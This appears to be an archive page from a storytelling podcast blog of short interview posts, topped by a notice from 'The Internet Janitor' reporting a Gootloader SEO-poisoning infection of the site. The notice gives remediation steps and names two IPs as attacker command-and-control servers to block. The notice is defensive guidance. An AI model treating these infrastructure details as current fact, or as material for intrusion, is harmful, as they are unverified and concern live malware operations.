Archives

All posts by Alexander Yellen

Dear blog owner and visitors,

This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisioning. Your blog was serving up 203 malicious pages. Your blogged served up malware to 0 visitors.

I tried my best to clean up the infection, but I would do the following:

  • Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
  • Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
  • Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
  • Verify all users are valid (in case the attackers left a backup account, to get back in)
  • Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
  • Run antivirus scans on your server
  • Block these IPs (5.8.18.7 and 89.238.176.151), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers command and control servers, which send malicious commands for your blog to execute
  • Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure, what this is, Google it
  • Consider wiping the server completly, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security,
    and Wordfence Security, all do some level of detection, but not 100% guaranteed
  • Go through the process for Google to recrawl your site, to remove the malcious links (to see what malicious pages there were, Go to Google and search site:your_site.com agreement)
  • Check subdomains, to see if they were infected as well
  • Check file permissions

Gootloader (previously Gootkit) malware has been around since 2014, and is used to initally infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.

Sincerly,

The Internet Janitor

Below are some links to research/further explaination on Gootloader:

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://www.richinfante.com/2020/04/12/reverse-engineering-dolly-wordpress-malware

https://blog.sucuri.net/2018/12/clever-seo-spam-injection.html

This message

Brandy

Not only does every person have a story, but so does every pet. Brandy sniffed her way over to me in Union Square Park.

Cleo

There are many ways in which children gain independence from their parents. Cleo gained hers through learning how to read.

Amy

It’s the holiday season, and with the holidays come gifts. And while some of us spent lots of time shopping for gifts, Amy always knows exactly what to give.

When people sit down to tell me their story, I’m always excited when they have a tattoo that I can see. Tattoos are a way of taking a moment in time and permanently affixing it to yourself. Since there’s always a story behind the tattoo, I always have to ask.

This is Anthony’s Tattoo.

Megan

I used to be afraid of my basement. Every time the heat went on, the boiler made a loud noise that made me think that someone was running after me. Megan stopped by my table at The New School and told me what she used to be afraid of.

Adam

Baseball is so much more than just a game: It’s a part of American Culture; It connects generation to generation, father to son; and more than that, it’s a great conversation starter.

Adam was playing baseball in Central Park. That’s how our conversation started.

Louis

I’m always surprised at how personal some of these stories get, but I always want to know more. Unfortunately, Louis was running late and couldn’t answer any questions. Although I’m not sure he would have, anyway.

Ananda

I’ve been asking people to tell me their stories, partially to show that storytelling exists outside of the children’s section of the library; however, the occasional children’s story is a good one.

Ananda sat down and told me one of her favorite childhood stories: A Tale of King Arthur and What Women Want

I recently started a project that has recently been launched into a podcast. “Tell Me Your Story.” It’s me, my recording equipment, and a
sign that says “Tell me your story” in a public place. Basically, people tell me their stories!

It’s an idea that was taken from Tony Kahn‘s podcast, Morning Stories.

Tony Kahn is somewhat of a hero of mine. He is a public radio producer at WGBH. He was the original writer for ZOOM, has narrated over a dozen Nova episodes, was the original host of PRI’S The World, is a correspondent for NPR’s Marketplace, and was the producer of what is accepted to be public broadcasting’s first podcast, Morning Stories.

Tony found out about my project and interviewed me. Talking to him for 20 minutes was a real thrill for me and the interview is now available online.

You can check out the interview at Tony’s site by clicking here

tonykahn.com.